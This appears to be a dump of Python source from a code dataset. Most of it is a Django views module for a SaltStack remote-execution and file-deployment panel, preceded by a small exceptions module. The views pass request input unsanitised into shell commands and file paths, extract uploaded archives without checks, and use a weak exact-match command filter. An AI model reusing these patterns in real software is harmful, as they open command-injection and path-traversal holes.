if indexNext == len(nums2):
result.append(-1)
return result
| 37 | 82 | 0.427928 |
4a224b6d84907c774a7d7e2536758387a23e7795 | 1,417 | py | Python | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | null | null | null | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | 17 | 2018-07-03T19:04:55.000Z | 2019-08-24T15:12:52.000Z | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | 1 | 2019-10-10T19:39:28.000Z | 2019-10-10T19:39:28.000Z | """ Custom exceptions for binx
"""
from marshmallow.exceptions import ValidationError
class BinxError(Exception):
""" A base exception for the library
"""
class InternalNotDefinedError(BinxError):
""" used for development - thrown if an Internal class is improperly declared on a Collection"""
class CollectionLoadError(BinxError):
""" thrown if a Collection fails to load its Internal Object Collection this could be due to a validation error or some other issue """
class FactoryProcessorFailureError(BinxError):
""" raised if the _process method of a Factory fails to produce any results
"""
class FactoryCreateValidationError(BinxError):
""" wraps a marshmallow validation error in the create method of the factory
"""
class RegistryError(BinxError, KeyError):
""" raised if a classname already exists in the collection registry
"""
class CollectionValidationError(ValidationError, BinxError):
""" subclass of a marshmallow validation error
"""
class AdapterCollectionResultError(BinxError):
""" thrown if a collection load fails while attempting to adapt
"""
class AdapterChainError(BinxError):
""" thrown if a input collection cannot be found on the adapter chain for a Collection
"""
class AdapterFunctionError(BinxError, ValueError):
""" thrown if a 2-tuple is not returned from a pluggable adapter function.
"""
| 29.520833 | 139 | 0.736768 |
4a224cf3522cdd805904fd04297a44fa94e48756 | 55,625 | py | Python | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | 3 | 2019-05-06T06:44:43.000Z | 2020-06-10T00:54:43.000Z | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | 1 | 2017-07-11T11:36:54.000Z | 2017-07-11T11:42:23.000Z | deploy/views.py | wxmgcs/devops | 7b0daf6121139c8bec80ec58c119d04d8aeadfe8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf8
'''
@author: qitan
@contact: [email protected]
@file: views.py
@time: 2017/3/30 15:28
@desc:
'''
from django.shortcuts import render, get_object_or_404, redirect
from django.http import Http404, HttpResponse
from django.http import StreamingHttpResponse
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from deploy.saltapi import SaltAPI
from devops import settings
from userperm.views import UserIP
from userperm.models import *
from .models import *
from .forms import *
# custom function
from tar_file import make_tar
from md5 import md5sum
try:
import json
except ImportError:
import simplejson as json
import time
import datetime
import shutil
import os
import re
import tarfile, zipfile
# Create your views here.
def dict_p(dict_a):
r = ''
iftrue = 0
temp = []
if isinstance(dict_a, dict):
for k in dict_a.keys():
if k == 'name':
dict_a.pop(k)
continue
if k == 'result' and not k:
temp.append(1)
else:
temp.append(0)
v = dict_a[k]
if isinstance(v,dict):
dict_p(v)
else:
r = r + k + ': ' + str(v) + '<br />'
if 1 in temp:
iftrue = 1
return {'result':r, 'iftrue':iftrue}
def list_dict(d):
s = {}
result = []
for k,v in d.items():
ret = {}
for m,n in v.items():
temp = dict_p(n)
s[m] = temp['result']
ret['iftrue'] = temp['iftrue']
ret[k] = s
result.append(ret)
return result
def ProjectExec(sapi, tgt_list, fun, arg, expr_form):
'''
定义项目进程管理
:param sapi:
:param tgt_list:
:param fun:
:param arg:
:param expr_form:
:return:
'''
jid = sapi.remote_execution(tgt_list, fun, arg + ';echo ":::"$?', expr_form)
s = SaltGroup.objects.get(groupname=tgt_list)
s_len = s.minions.all().count()
ret = ''
rst = {}
while (len(rst) < s_len):
rst = sapi.salt_runner(jid)
# time.sleep(1)
for k in rst:
ret = ret + u'主机:<span style="color:#e6db74">' + k + '</span><br />运行结果:<br />%s<br />' % rst[k]
r = rst[k].split(':::')[-1].strip()
if r != '0':
ret = ret + '<span style="color:#f92672">%s</span> 执行失败!<br />' % arg + '<br />'
else:
ret = ret + '<span style="color:#e6db74">%s</span> 执行成功!<br />' % arg + '<br />'
return {u'进程管理': {'result': ret}}
def RemoteExec(request, fun, group=False):
'''
定义远程命令函数
'''
command_list = [j.command.split(',') for i in request.user.group.all() for j in i.command.filter(is_allow=True)]
command_list = [j for i in command_list for j in i]
check = 2
is_group = False
ret = ''
temp_dict = {}
result = []
jid = ''
arg = ''
if request.method == 'POST':
if request.is_ajax():
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_list = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
is_group = True
else:
tgt_select = request.POST.getlist('tgt_select[]')
if not tgt_select:
tgt_list = request.POST.get('tgt_select')
else:
tgt_list = ','.join(tgt_select)
expr_form = 'list'
if fun == 'cmd.run':
arg = request.POST.get('arg').strip(' ')
else:
arg = request.POST.get('arg')
module = ModuleUpload.objects.get(pk=arg)
if module.visible == 0:
arg = 'module.user_%s.%s'%(module.user.pk, module.module)
elif module.visible == 2:
arg = 'module.public.%s'%module.module
else:
arg = 'module.group_%s.%s'%(module.user_group.pk, module.module)
if is_group:
s = SaltGroup.objects.get(groupname=tgt_list)
s_len = s.minions.all().count()
else:
s = tgt_list.split(',')
s_len = len(s)
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
try:
## 远程命令
if fun == 'cmd.run':
if arg in command_list and not request.user.is_superuser:
sret = {'CRITICAL': '不能执行此命令,老大会不高兴滴...', 'iftrue':2}
result.append(sret)
elif not arg or not tgt_list:
check = 1
sret = {'WARNING': '未选择主机或未输入命令...', 'iftrue':1}
result.append(sret)
else:
is_danger = []
for command in command_list:
for j in command.split(' '):
if j == arg:
is_danger.append(1)
if is_danger and not request.user.is_superuser:
sret = {'CRITICAL': '不能执行此命令,老大会不高兴滴...', 'iftrue':2}
result.append(sret)
else:
jid = sapi.remote_execution(tgt_list, fun, arg + ';echo ":::"$?', expr_form)
rst = {}
t = 0
r = None
while (t < 5):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
check = 0
for k, v in rst.items():
check = v.split(':::')[-1].strip()
result.append({k:v.replace('\n', '<br />'), 'iftrue':int(check)})
else:
check = 1
sret = {'INFO': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid, 'iftrue':1}
result.append(sret)
## 模块部署
else:
jid = sapi.remote_execution(tgt_list, fun, arg, expr_form)
rst = {}
t = 0
r = None
while(t<3):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
check = 0
sret = rst
result = list_dict(sret)
else:
check = 1
sret = {'INFO': {'消息': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid}, 'iftrue':1}
result.append(sret)
if not arg or not tgt_list:
check = 1
sret = {'WARNING': {'警告': '未选择主机或未输入命令...'}, 'iftrue':1}
result.append(sret)
temp_dict['result'] = result
temp_dict['jid'] = jid
except:
pass
return {'result':result, 'sret':temp_dict, 'arg':arg, 'jid':jid, 'check':check, 'is_group':is_group}
def UploadFile(request, form, group=False):
'''
定义文件上传函数
'''
danger = []
check = False
is_group = False
rst = ''
ret = ''
jid = ''
fileupload = FileUpload()
if request.method == 'POST':
dir_list = [j.directory.split(',') for i in request.user.group.all() for j in i.directory.filter(is_allow=True)]
dir_list = [j for i in dir_list for j in i]
form = SaltFileForm(request.POST)
if request.is_ajax():
file_path = request.FILES.get('file_path', None)
remote_path = request.POST.get('remote_path', None)
remark = request.POST.get('remark', None)
print file_path,'file',remote_path,'path',remark,'remark'*20
if not file_path:
return HttpResponse(json.dumps(u'未选择文件'))
if remote_path not in dir_list or request.user.is_superuser:
tag = '%s%s'%(request.user.id, datetime.datetime.now().strftime('%j%Y%m%d%H%M%S'))
upload_dir = './media/salt/fileupload/user_%s/%s' % (request.user.id, tag)
if not os.path.exists(upload_dir):
os.makedirs(upload_dir)
dest = open(os.path.join(upload_dir, file_path.name), 'wb+')
for chunk in file_path.chunks():
dest.write(chunk)
dest.close()
if request.POST.get('check_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_list = SaltGroup.objects.get(nickname=grp).groupname
expr_form = 'nodegroup'
is_group = True
tgt_select = [tgt_list]
else:
tgt_select = request.POST.getlist('tgt_select')
tgt_list = ','.join(tgt_select)
expr_form = 'list'
objs = [
FileUpload(
user = request.user,
target = tgt,
file_path = file_path,
remote_path = remote_path,
file_tag = tag,
remark = remark
)
for tgt in tgt_select
]
FileUpload.objects.bulk_create(objs)
local_path = 'salt://fileupload/user_%s/%s/%s'%(request.user.id, tag, file_path.name)
remote_path = '%s/%s'%(remote_path, file_path.name)
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
# 获取文件MD5
file_md5 = md5sum(os.path.join(upload_dir, file_path.name))
# 备份远程文件
ret_bak = sapi.file_manage(tgt_list, 'file_bakup.Backup', remote_path, tag, file_md5, expr_form)
# 上传文件到远程
ret = sapi.file_copy(tgt_list, 'cp.get_file', local_path, remote_path, expr_form)
# 分组上传文件时,只需从其中一台salt主机备份文件,备份完成后设置group_forloop为false
group_forloop = True
for k in ret:
if ret[k] and ret_bak[k] == 0:
rst = rst + u'主机:' + k + u'\n远程文件%s上传成功,备份成功...\n' % remote_path + '-' * 80 + '\n'
if request.POST.get('check_type') == 'panel-group' and group_forloop:
try:
FileRollback.objects.get_or_create(user=request.user,target=tgt_list,cur_path=remote_path,
bak_path=remote_path,file_tag=tag,
remark=remark,is_group=True)
except:
print 'not create'
group_forloop = False
else:
try:
FileRollback.objects.get_or_create(user=request.user,target=k,cur_path=remote_path,
bak_path=remote_path,file_tag=tag,
remark=remark)
except:
print 'not create'
elif ret[k] and ret_bak[k] == 1:
rst = rst + u'主机:' + k + u'\n远程文件%s未更改...\n' % remote_path + '-' * 80 + '\n'
elif ret[k] and not ret_bak[k]:
rst = rst + u'主机:' + k + u'\n远程文件%s上传成功,备份失败或不存在...\n' % remote_path + '-' * 80 + '\n'
else:
rst = rst + u'主机:' + k + u'\n远程文件%s上传失败...\n'%remote_path + '-'*80 + '\n'
else:
rst = u'无权限更改此目录'
return {'ret':rst, 'check':check, 'is_group':is_group}
def AjaxResult(jid,result_type,check_type):
'''
定义ajax查询结果函数
'''
sret = {}
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
rtype = '远程命令'
result = ''
t = 0
r = None
while (t < 3):
rst = sapi.salt_runner(jid)
if rst:
r = True
break
t = t + 1
#time.sleep(1)
if check_type == 'deploy':
rtype = '模块部署'
if r:
sret = rst
sret = list_dict(sret)
else:
sret = {'INFO': {'消息': '请稍候重新查询...'}}
try:
for k,v in sret.items():
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />'
for m,n in v.items():
result = result + m + '<br />' + n
result = result + "</p>"
except:
result = 'Err'
else:
if r:
for k,v in rst.items():
sret[k] = v.replace('\n', '<br />')
else:
sret = {'INFO': '请稍候重新查询...'}
for k,v in sret.items():
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />' + v + '</p>'
try:
# 记录查询操作日志
message = get_object_or_404(Message, action=jid)
m = re.search('\[([^:]*)\]', message.content)
arg = m.groups()[0]
message.content = '%s:[%s]<br />原始输出:<br />%s'%(rtype, arg, result)
message.audit_time = datetime.datetime.now()
message.save()
except:
print 'Err'
pass
#if result_type == '1':
return sret
#else:
# return rst_all
@login_required
def salt_key_list(request):
'''
salt主机列表
'''
if request.user.is_superuser:
minions = SaltHost.objects.filter(status=True)
minions_pre = SaltHost.objects.filter(status=False)
return render(request, 'salt_key_list.html', {'all_minions':minions,'all_minions_pre':minions_pre})
else:
raise Http404
@login_required
def salt_program_list(request):
if request.user.is_superuser:
minions = SaltHost.objects.filter(status=True)
minions_pre = SaltHost.objects.filter(status=False)
print minions
print minions_pre
return render(request, 'salt_program_list.html', {'all_minions':minions,'all_minions_pre':minions_pre})
else:
raise Http404
@login_required
def salt_key_import(request):
'''
导入salt主机
'''
if request.user.is_superuser:
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
minions,minions_pre = sapi.list_all_key()
alive = False
ret_alive = sapi.salt_alive('*')
for node_name in minions:
try:
alive = ret_alive[node_name]
alive = True
except:
alive = False
try:
SaltHost.objects.create(hostname=node_name,alive=alive,status=True)
except:
salthost = SaltHost.objects.get(hostname=node_name)
now = datetime.datetime.now()
alive_old = SaltHost.objects.get(hostname=node_name).alive
if alive != alive_old:
salthost.alive_time_last = now
salthost.alive = alive
salthost.alive_time_now = now
salthost.save()
for node_name in minions_pre:
try:
SaltHost.objects.get_or_create(hostname=node_name,alive=alive,status=False)
except:
print 'not create'
return redirect('key_list')
else:
raise Http404
@login_required
def salt_key_manage(request, hostname=None):
'''
接受或拒绝salt主机,同时更新数据库
'''
if request.user.is_superuser:
if request.method == 'GET':
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
hostname = request.GET.get('hostname')
salthost = SaltHost.objects.get(hostname=hostname)
action = ''
if request.GET.has_key('add'):
ret = sapi.accept_key(hostname)
if ret:
salthost.status=True
salthost.save()
result = 3
action = u'添加主机'
if request.GET.has_key('delete'):
ret = sapi.delete_key(hostname)
if ret:
salthost.status=False
salthost.save()
result = 2
action = u'删除主机'
if request.GET.has_key('flush') and request.is_ajax():
# result: 0 在线 | 1 离线
result = 0
ret = sapi.salt_alive(hostname)
try:
alive = ret[hostname]
alive = True
except:
alive = False
result = 1
salthost.alive=alive
salthost.save()
action = u'刷新主机'
if action:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=action,
action_ip=UserIP(request),
content=u'%s %s' % (action, salthost.hostname))
return HttpResponse(json.dumps(result))
if action:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=action, action_ip=UserIP(request),content=u'%s %s'%(action,salthost.hostname))
return redirect('key_list')
else:
raise Http404
@login_required
def salt_group_list(request):
'''
salt主机分组列表
'''
if request.user.is_superuser:
groups = SaltGroup.objects.all()
return render(request, 'salt_group_list.html', {'all_groups': groups})
else:
raise Http404
@login_required
def salt_group_manage(request, id=None):
'''
salt主机分组管理,同时更新salt-master配置文件
'''
if request.user.is_superuser:
action = ''
page_name = ''
if id:
group = get_object_or_404(SaltGroup, pk=id)
action = 'edit'
page_name = '编辑分组'
else:
group = SaltGroup()
action = 'add'
page_name = '新增分组'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
group = get_object_or_404(SaltGroup, pk=id)
group.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除分组', action_ip=UserIP(request),content='删除分组 %s'%group.nickname)
with open('./saltconfig/nodegroup.conf','r') as f:
with open('./nodegroup', 'w') as g:
for line in f.readlines():
if group.groupname not in line:
g.write(line)
shutil.move('./nodegroup','./saltconfig/nodegroup.conf')
return redirect('group_list')
if request.method == 'POST':
form = SaltGroupForm(request.POST, instance=group)
if form.is_valid():
minion_select = request.POST.getlist('minion_sel')
minion_delete = request.POST.getlist('minion_del')
# 前台分组以别名显示,组名不变
if action == 'add':
group = form.save(commit=False)
group.groupname = form.cleaned_data['nickname']
elif action == 'edit':
form.save()
group.save()
group.minions.add(*minion_select)
group.minions.remove(*minion_delete)
group.save()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name, action_ip=UserIP(request),content='%s %s'%(page_name,group.nickname))
minions_l = []
for m in group.minions.values('hostname'):
minions_l.append(m['hostname'])
minions_str = ','.join(minions_l)
try:
with open('./saltconfig/nodegroup.conf','r') as f:
with open('./nodegroup', 'w') as g:
for line in f.readlines():
if group.groupname not in line:
g.write(line)
g.write(" %s: 'L@%s'\n"%(group.groupname,minions_str))
shutil.move('./nodegroup','./saltconfig/nodegroup.conf')
except:
with open('./saltconfig/nodegroup.conf', 'w') as g:
g.write("nodegroups:\n %s: 'L@%s'\n"%(group.groupname,minions_str))
import subprocess
subprocess.Popen('systemctl restart salt-master salt-api', shell=True)
return redirect('group_list')
else:
form = SaltGroupForm(instance=group)
return render(request, 'salt_group_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'aid':id})
else:
raise Http404
@login_required
def salt_module_list(request):
'''
模块列表
'''
if request.user.has_perm('deploy.view_deploy'):
if request.user.is_superuser:
module_list = ModuleUpload.objects.all()
else:
# 获取用户创建或公开模块
module_visible_list = [{'pk': i.pk, 'name': i.name, 'module': i.module, 'remark': i.remark, 'user': i.user}
for i in ModuleUpload.objects.filter(Q(user=request.user) | Q(visible=2))]
# 获取用户组模块
module_user_group_list = [{'pk': i.pk, 'name': i.name, 'module': i.module, 'remark': i.remark, 'user': i.user}
for g in User.objects.get(pk=request.user.pk).group.all() for i in ModuleUpload.objects.filter(user_group=g)]
# 合并list
module_list = module_visible_list + [i for i in module_user_group_list if i not in module_visible_list]
return render(request, 'salt_module_list.html', {'modules':module_list})
else:
raise Http404
@login_required
def salt_module_manage(request, id=None):
'''
模块管理
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_module']):
ret = ''
upload_stat = True
if id:
module = get_object_or_404(ModuleUpload, pk=id)
if request.user.pk != module.user.pk and not request.user.is_superuser:
return HttpResponse("Not Allowed!")
old_path = module.upload_path.path.split('.')
action = 'edit'
page_name = '编辑模块'
else:
module = ModuleUpload()
action = 'add'
page_name = '新增模块'
if request.method == 'GET':
if request.GET.has_key('delete'):
id = request.GET.get('id')
module = get_object_or_404(ModuleUpload, pk=id)
if request.user.pk != module.user.pk and not request.user.is_superuser:
return HttpResponse("Not Allowed!")
module.delete()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=u'删除模块', action_ip=UserIP(request),content=u'删除模块 %s'%module.name)
cur_path = module.upload_path.path.split('.')[0]
try:
os.remove('%s.sls'%(cur_path))
except:
shutil.rmtree(cur_path, ignore_errors=True)
return redirect('module_list')
if request.method == 'POST':
form = ModuleForm(request.POST, request.FILES, instance=module)
if form.is_valid():
visible = form.cleaned_data['visible']
module_list = form.cleaned_data['module'].split('.')
user_group = request.POST.get('user_group')
if visible == 0:
ext_path = './media/salt/module/user_%s' % request.user.id
salt_path = 'salt://module/user_%s/%s' % (request.user.id, module_list[0])
elif visible == 2:
ext_path = './media/salt/module/public'
salt_path = 'salt://module/public/%s'%module_list[0]
else:
ext_path = './media/salt/module/group_%s' % user_group
salt_path = 'salt://module/group_%s/%s' % (user_group, module_list[0])
file_exists = request.POST.get('upload_path')
file_name = form.cleaned_data['upload_path']
file_ext = str(file_name).split('.')[-1]
ext = ['bz2','gz','zip','sls']
if file_ext in ext:
if action == 'add':
module = form.save(commit=False)
module.user = request.user
else:
form.save
if user_group:
module.user_group = UserGroup.objects.get(pk=user_group)
module.save()
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=page_name, action_ip=UserIP(request),content='%s %s'%(page_name,module.name))
src = module.upload_path.path
if file_exists == None:
try:
os.remove('%s.sls'%old_path[0])
except:
pass
try:
if file_ext == 'zip':
tar = zipfile.ZipFile(src)
else:
tar = tarfile.open(src)
tar.extractall(path=ext_path)
tar.close()
with open('%s/%s/%s.sls'%(ext_path,module_list[0],module_list[1]), 'r+') as f:
t = f.read()
t = t.replace('SALTSRC', salt_path)
f.seek(0, 0)
f.write(t)
ret = u'模块 %s 已上传完成!'%(file_name)
except:
upload_stat = False
ret = u'模块 %s 上传失败,请上传.sls文件或.tar.gz/.tar.bz2/.zip压缩包并确认压缩文件是否损坏!'%(file_name)
try:
os.remove(src)
except:
shutil.rmtree(src, ignore_errors=True)
pass
if upload_stat:
return redirect('module_list')
else:
return render(request, 'salt_module_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'ret':ret})
else:
ret = u'不支持的文件格式,请上传.sls文件或.tar.gz/.tar.bz2/.zip压缩包!'
else:
form = ModuleForm(instance=module)
return render(request, 'salt_module_manage.html', {'form':form, 'action':action, 'page_name':page_name, 'ret':ret, 'id':id})
else:
raise Http404
@login_required
def salt_ajax_minions(request):
'''
获取不同分组下的主机列表
'''
if request.user.has_perms(['deploy.view_deploy']):
ret = []
if request.method == 'POST':
grp = request.POST.get('tgt_select', None)
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
if request.is_ajax():
group = SaltGroup.objects.get(groupname=tgt_select)
group_minions = group.minions.all()
for i in group_minions:
ret.append(i.hostname)
return HttpResponse(json.dumps(ret))
else:
raise Http404
@login_required
def salt_ajax_result(request):
'''
ajax方式查询结果
'''
if request.user.has_perm('deploy.edit_deploy'):
if request.method == 'POST':
check_type = request.POST.get('type', None)
jid = request.POST.get('jid', None)
result_type = request.POST.get('result_type', None)
if request.is_ajax():
rst_all = AjaxResult(jid,result_type,check_type)
return HttpResponse(json.dumps(rst_all))
else:
raise Http404
@login_required
def salt_remote_exec(request):
'''
salt远程命令界面
'''
if request.user.has_perm('deploy.view_deploy'):
return render(request, 'salt_remote_exec.html', {'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_remote_exec(request):
'''
salt远程命令执行
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
result = ''
rst = RemoteExec(request, fun='cmd.run')
if not rst['jid']:
rst['jid'] = 'DANGER'
try:
for i in rst['sret']['result']:
for k, v in i.items():
if k != 'iftrue':
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />' + v + '<br />'
result = result + 'retcode: %s</p>' % i['iftrue']
except:
result = 'Err'
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=rst['jid'], action_ip=UserIP(request),
content=u'远程命令 [%s]<br />原始输出:<br />%s' % (rst['arg'], result))
return HttpResponse(json.dumps(rst['sret']))
else:
raise Http404
@login_required
def salt_module_deploy(request):
'''
salt模块部署界面
'''
if request.user.has_perm('deploy.view_deploy'):
modules = ModuleUpload.objects.all()
return render(request, 'salt_module_deploy.html', {'modules':modules, 'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_module_deploy(request):
'''
salt模块部署
'''
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
result = ''
rst = RemoteExec(request, fun='state.sls')
try:
for i in rst['sret']['result']:
for k, v in i.items():
if k != 'iftrue':
result = result + '主机:' + k + '<br /><p class="mydashed">结果:<br />'
for m, n in v.items():
result = result + m + '<br />' + n
result = result + 'retcode: %s</p>' % i['iftrue']
except:
result = 'Err'
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=rst['jid'], action_ip=UserIP(request),
content=u'模块部署 [%s]<br />原始输出:<br />%s' % (rst['arg'], result))
return HttpResponse(json.dumps(rst['sret']))
else:
raise Http404
@login_required
def salt_advanced_manage(request):
if request.user.has_perms(['deploy.view_deploy']):
ret = ''
sret = {}
result = []
check = 2
is_group = False
if request.method == 'POST':
if request.user.has_perms(['deploy.view_deploy', 'deploy.edit_deploy']):
if request.is_ajax():
tgt_selects = request.POST.getlist('tgt_select', None)
args = request.POST.getlist('arg', None)
checkgrp = request.POST.getlist('ifcheck', None)
check_type = request.POST.get('check_type', None)
if check_type == 'panel-group':
is_group = True
expr_form = 'nodegroup'
else:
expr_form = 'list'
s='::'.join(str(i) for i in checkgrp)
checkgrp = s.replace('0::1','1').split('::')
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
for i in range(0,len(tgt_selects)):
tgt = tgt_selects[i]
try:
jid = sapi.remote_execution(tgt, 'cmd.run', args[i] + ';echo ":::"$?', expr_form)
if is_group:
## 获取组内主机数量
s = SaltGroup.objects.get(groupname=tgt)
s_len = s.minions.all().count()
else:
s_len = 1
rst = {}
t = 0
r = None
while (t < 5):
rst = sapi.salt_runner(jid)
if len(rst) == s_len:
r = True
break
t = t + 1
#time.sleep(1)
if r:
sret = {}
j = 0
for k, v in rst.items():
iftrue = v.split(':::')[-1].strip()
if iftrue != '0':
check = 2
if checkgrp[i] == '0':
try:
Message.objects.create(type=u'部署管理', user=request.user.first_name,
action=jid, action_ip=UserIP(request),
content=u'高级管理 Test')
except:
print 'Log Err'
return HttpResponse(json.dumps(ret))
else:
continue
else:
check = 0
if is_group:
sret['L%s-%s: %s'%(i,j,k)] = v.replace('\n', '<br />')
else:
sret['L%s: %s' % (i, k)] = v.replace('\n', '<br />')
sret['iftrue'] = check
j = j + 1
else:
check = 1
sret = {'INFO': '请稍候点击[重新查询]或到任务管理中查询结果<jid: %s>...'%jid}
result.append(sret)
except:
print 'Err'
try:
Message.objects.create(type=u'部署管理', user=request.user.first_name, action=jid, action_ip=UserIP(request),content=u'高级管理 Test')
except:
print 'Log Err'
return HttpResponse(json.dumps(result))
else:
raise Http404
return render(request, 'salt_remote_exec_advance.html', {})
else:
raise Http404
@login_required
def salt_file_upload(request):
'''
文件上传界面
'''
if request.user.has_perm('deploy.view_filemanage'):
form = SaltFileForm()
return render(request, 'salt_file_upload.html', {'form':form,'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_file_download(request):
def file_iterator(file_name, chunk_size=512):
with open(file_name) as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
if request.user.has_perms(['deploy.view_filemanage']):
sapi = SaltAPI(url=settings.SALT_API['url'],username=settings.SALT_API['user'],password=settings.SALT_API['password'])
if request.method == 'POST':
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_filedownload']):
if request.POST.get('type') == 'list':
rst = RemoteExec(request, fun='cmd.run')
return HttpResponse(json.dumps(rst['ret']))
else:
tgt_list = request.POST.get('tgt_select', None)
arg = request.POST.get('arg', None)
jid = sapi.remote_execution(tgt_list, 'cmd.run', 'if [ -d %s ];then echo 0;else echo 1;fi'%arg, 'list')
rst = sapi.salt_runner(jid)
if rst[tgt_list] == '0':
return HttpResponse(json.dumps(arg))
elif rst[tgt_list] == '1':
return HttpResponse(json.dumps("download"))
else:
print 'Err'
else:
raise Http404
if request.method == 'GET':
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_filedownload']):
if request.GET.get('type') == 'download':
tgt_select = request.GET.get('tgt_select', None)
arg = request.GET.get('arg', None)
remote_file = arg
ret_bak = sapi.file_bak(tgt_select, 'cp.push', remote_file, 'list')
if tgt_select == 'localhost':
return render(request,'redirect.html',{})
remote_path = remote_file.replace(remote_file.split('/')[-1],'')
dl_path = './media/salt/filedownload/user_%s/%s%s'%(request.user.id,tgt_select,remote_path)
dl_file = '%s%s'%(dl_path,remote_file.split('/')[-1])
if not os.path.exists(dl_path):
os.makedirs(dl_path)
try:
shutil.copy('/var/cache/salt/master/minions/%s/files/%s' % (tgt_select,remote_file), dl_file)
tar_file = make_tar(dl_file,'/tmp')
dl_filename = 'attachment;filename="{0}"'.format(tar_file.replace('/tmp/','%s%s'%(tgt_select,remote_path)))
ret = u'主机:%s\n结果:远程文件 %s 下载成功!'%(tgt_select,remote_file)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件下载', action_ip=UserIP(request),content=u'下载文件 \n%s'%ret)
response = StreamingHttpResponse(file_iterator(tar_file))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = dl_filename
return response
except:
print 'No such file or dirctory'
ret = u'主机:%s\n结果:远程文件 %s 下载失败,请确认文件是否存在!'%(tgt_select,remote_file)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件下载', action_ip=UserIP(request),content=u'下载文件 \n%s'%ret)
return render(request, 'salt_file_download.html', {'ret':ret})
else:
raise Http404
return render(request, 'salt_file_download.html', {})
else:
raise Http404
@login_required
def salt_ajax_file_upload(request):
'''
执行文件上传
'''
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_fileupload']):
form = SaltFileForm()
ret = UploadFile(request,form=form)
Message.objects.create(type=u'文件管理', user=request.user.first_name, action=u'文件上传', action_ip=UserIP(request),content=u'上传文件 %s'%ret['ret'])
return HttpResponse(json.dumps(ret['ret']))
else:
raise Http404
@login_required
def salt_file_rollback(request):
'''
文件回滚界面
'''
if request.user.has_perm('deploy.view_filemanage'):
form = SaltFileForm()
return render(request, 'salt_file_rollback.html', {'form':form,'groups':['panel-single','panel-group']})
else:
raise Http404
@login_required
def salt_ajax_file_rollback(request):
'''
执行文件回滚
'''
if request.user.has_perms(['deploy.view_filemanage', 'deploy.edit_fileupload']):
true = True
if request.method == 'POST':
if request.is_ajax():
r_list = []
if request.POST.get('check_type') == 'rollback_file':
if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
rollback_list = FileRollback.objects.filter(target=tgt_select)
r_list = []
for r in rollback_list:
r_list.append(r.cur_path)
func = lambda x,y:x if y in x else x + [y]
r_list = reduce(func,[[],]+r_list)
return HttpResponse(json.dumps(r_list))
if request.POST.get('check_type') == 'rollback_history_list':
if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
cur_path = request.POST.get('rollback_list', None)
rollback_history_list = FileRollback.objects.filter(cur_path=cur_path).filter(target=tgt_select)
for r in rollback_history_list:
r_list.append(r.file_tag)
return HttpResponse(json.dumps(r_list))
if request.POST.get('check_type') == 'rollback_history_remark':
if request.POST.get('get_type') == 'panel-group':
grp = request.POST.get('tgt_select')
tgt_select = SaltGroup.objects.get(nickname=grp).groupname
else:
tgt_select = request.POST.get('tgt_select')
